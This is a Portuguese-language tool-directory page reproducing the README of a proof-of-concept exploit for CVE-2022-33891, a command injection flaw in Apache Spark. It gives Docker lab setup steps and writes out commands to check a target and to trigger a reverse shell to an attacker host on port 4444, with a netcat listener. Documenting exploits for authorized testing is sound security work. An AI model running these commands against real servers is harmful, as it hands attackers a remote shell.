Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2022-33891 — Prova de conceito de exploit para injeção de comandos no Apache Spark (CVE-2022-33891) com modos de verificação e shell reverso, permitindo testes de segurança autorizados. | Kitploit
Ferramentas/GitHubGitHub/asepsaepdin/cve-2022-33891
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleAprendizado e Educação
GitHubasepsaepdin/cve-2022-33891

CVE-2022-33891

Prova de conceito de exploit para injeção de comandos no Apache Spark (CVE-2022-33891) com modos de verificação e shell reverso, permitindo testes de segurança autorizados.

Ver Repositório
2há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2022-33891 - Vulnerabilidade de Injeção de Comandos no Apache Spark

Python


⚠️ Apenas para fins educacionais e de pesquisa de segurança autorizados

Autores do Exploit Original

Muito grato ao autor original do PoC AkbarTrilaksana

Descrição

A interface do Apache Spark oferece a possibilidade de habilitar ACLs através da opção de configuração spark.acls.enable. Com um filtro de autenticação, isso verifica se um usuário tem permissões de acesso para visualizar ou modificar a aplicação. Se as ACLs estiverem habilitadas, um caminho de código no HttpSecurityFilter pode permitir que alguém faça impersonação fornecendo um nome de usuário arbitrário. Um usuário malicioso pode então ser capaz de alcançar uma função de verificação de permissão que, em última análise, construirá um comando Unix shell com base em sua entrada e o executará. Isso resultará na execução arbitrária de comandos shell como o usuário que está executando o Spark. Isso afeta as versões do Apache Spark 3.0.3 e anteriores, versões 3.1.1 a 3.1.2 e versões 3.2.0 a 3.2.1.


Guia de Passos

  1. Primeiro, clone o repositório

    root@kitploit:~
    git clone https://github.com/asepsaepdin/CVE-2022-33891.git
    
  2. Mude o diretório

    root@kitploit:~
    cd CVE-2022-33891
    
  3. Instale as dependências:

    root@kitploit:~
    pip3 install -r requirements.txt --break-system-packages
    
  4. Inicie o container

    root@kitploit:~
    docker compose up
    
  5. Em um novo terminal, execute o comando

    root@kitploit:~
    docker exec -it CVE-2022-33891-spark-1 /bin/bash
    
  6. Na sessão bash do contêiner, digite:

    root@kitploit:~
    echo "spark.acls.enable       true" >> conf/spark-defaults.conf
    
  7. Opcionalmente, use cat para ver o conteúdo do arquivo spark-defaults.conf e garantir que está correto.

  8. Saia do shell bash interativo e pressione Ctl-C no seu processo docker-compose.

  9. Assim que os contêineres forem desligados corretamente, execute novamente docker-compose up

    root@kitploit:~
    docker compose up
    
  10. Verifique se o alvo é vulnerável:

    root@kitploit:~
    python3 poc.py -u http://localhost -p 8080 --check
    
  11. Do ponto de vista do atacante, a execução remota de código é crítica para obter acesso a um shell interativo. Portanto, executar o comando abaixo acionaria um shell reverso telnet sobre tcp baseado em bash para o sistema do atacante na porta 4444/tcp:

    root@kitploit:~
    python3 poc.py -u http://localhost -p 8080 --revshell -lh 172.16.10.24 -lp 4444
    
    root@kitploit:~
    nc -nlvp 4444
    

Créditos

  • https://github.com/AkbarTrilaksana/cve-2022-33891
  • https://nvd.nist.gov/vuln/detail/cve-2022-33891
Baixar ferramenta